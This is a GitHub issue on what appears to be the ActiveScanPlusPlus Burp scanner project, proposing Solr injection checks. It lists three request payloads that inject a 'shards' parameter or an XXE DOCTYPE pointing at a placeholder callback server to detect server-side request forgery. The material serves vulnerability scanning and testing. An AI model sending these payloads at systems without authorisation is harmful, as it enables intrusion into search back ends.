ActiveScanPlusPlus icon indicating copy to clipboard operation
ActiveScanPlusPlus copied to clipboard
verified publisher icon albinowax

Solr Injection

Open infosec-au opened this issue 6 years ago • 0 comments

https://github.com/artsploit/solr-injection#black-box-detection

GET /xxx?q=aaa%26shards=http://callback_server/solr 
GET /xxx?q=aaa&shards=http://callback_server/solr
GET /xxx?q={!type=xmlparser v="<!DOCTYPE a SYSTEM 'http://callback_server/solr'><a></a>"}

Solr is used a lot in underlying search/filtering technology, so I think these payloads should be tried in most forms, could lead to easy bugs.

infosec-au avatar Aug 13 '19 08:08 infosec-au